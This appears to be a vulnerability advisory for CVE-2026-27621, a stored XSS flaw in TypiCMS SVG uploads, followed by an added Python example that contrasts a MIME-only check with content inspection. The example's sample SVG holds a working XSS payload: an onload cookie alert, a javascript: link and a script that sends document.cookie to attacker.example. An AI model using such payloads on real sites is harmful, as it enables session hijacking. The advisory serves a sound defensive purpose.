PT-2026-21843 · Typicms +1

Lukasz-Rybak · Published 2026-02-25 · Updated 2026-02-25 · CVE-2026-27621 · CVSS v4.0 6.8 Medium

Vector: AV:N/AC:L/AT:N/PR:L/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
Name of the Vulnerable Software and Affected Versions: TypiCMS versions prior to 16.1.7

Description: TypiCMS is a content management system built on the Laravel framework. A stored cross-site scripting (XSS) vulnerability exists in its file upload functionality. The application lets users with file upload privileges upload SVG files, but it validates only the MIME type and does not sanitize the file content; an SVG that passes the MIME check can still carry script. An attacker can therefore upload a malicious SVG file containing JavaScript. When another user views the file, the script executes in that user's browser and can compromise their session. The 500 error that TypiCMS returns when an uploaded SVG lacks a viewBox attribute is not a mitigation: the attacker simply includes a valid viewBox attribute in the payload.

Recommendations: Update TypiCMS to version 16.1.7 or later.
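The following is an added illustration, not code from TypiCMS or from the advisory. It shows in Python why a MIME-type check alone does not stop this class of upload: a malicious SVG with a valid viewBox is still a well-formed SVG and is reported as image/svg+xml, so only an inspection of the document content catches the script. The sample files, the simplified sniff_mime() stand-in for libmagic-style detection, and the accept_upload_*() functions are all constructed for this example.

```python
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"

# Constructed samples (not from the advisory). The malicious file keeps a
# valid viewBox so the CMS renders it instead of failing with a 500 error.
BENIGN_SVG = b"""<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100">
  <circle cx="50" cy="50" r="40" fill="blue"/>
</svg>"""

MALICIOUS_SVG = b"""<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 100 100">
  <circle cx="50" cy="50" r="40" fill="red" onload="alert(document.cookie)"/>
  <script>fetch('https://attacker.example/?c=' + document.cookie)</script>
  <a xlink:href="javascript:alert(1)"><text y="20">click</text></a>
</svg>"""


def sniff_mime(data: bytes) -> str:
    """Simplified stand-in for MIME detection (assumption: mirrors how a
    magic-based sniffer classifies SVG). Any well-formed XML whose root is an
    <svg> element is reported as image/svg+xml, script or not."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return "application/octet-stream"
    if root.tag == "{%s}svg" % SVG_NS:
        return "image/svg+xml"
    return "application/xml"


def local_name(qname: str) -> str:
    """Strip the {namespace} prefix ElementTree puts on tags and attributes."""
    return qname.rsplit("}", 1)[-1] if "}" in qname else qname


def find_active_content(data: bytes) -> list:
    """Return the reasons an SVG would run script when rendered inline:
    <script>/<foreignObject> elements, on* event handlers, javascript: hrefs."""
    findings = []
    for el in ET.fromstring(data).iter():
        tag = local_name(el.tag)
        if tag in ("script", "foreignObject"):
            findings.append("<%s> element" % tag)
        for attr, value in el.attrib.items():
            name = local_name(attr).lower()
            if name.startswith("on"):
                findings.append("%s handler on <%s>" % (name, tag))
            if name == "href" and value.strip().lower().startswith("javascript:"):
                findings.append("javascript: URI on <%s>" % tag)
    return findings


def accept_upload_mime_only(data: bytes) -> bool:
    """The insufficient check: the malicious SVG passes because its type is right."""
    return sniff_mime(data) == "image/svg+xml"


def accept_upload_hardened(data: bytes) -> bool:
    """MIME check plus content inspection: reject any SVG carrying active content."""
    if sniff_mime(data) != "image/svg+xml":
        return False
    return not find_active_content(data)


if __name__ == "__main__":
    for label, svg in (("benign", BENIGN_SVG), ("malicious", MALICIOUS_SVG)):
        print(label, sniff_mime(svg),
              "mime-only:", accept_upload_mime_only(svg),
              "hardened:", accept_upload_hardened(svg),
              find_active_content(svg))
```

Rejecting or sanitizing at upload time is one half of the fix; the other is how the file is served. A stored SVG that is returned with Content-Disposition: attachment, or under a restrictive Content-Security-Policy, does not execute script even if it slips through, whereas one rendered inline on the CMS origin runs with that origin's cookies and session.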

Exploit

Fix

XSS


Weakness Enumeration

Related Identifiers

CVE-2026-27621
GHSA-XFVG-8V67-J7WP

Affected Products

Laravel
Typicms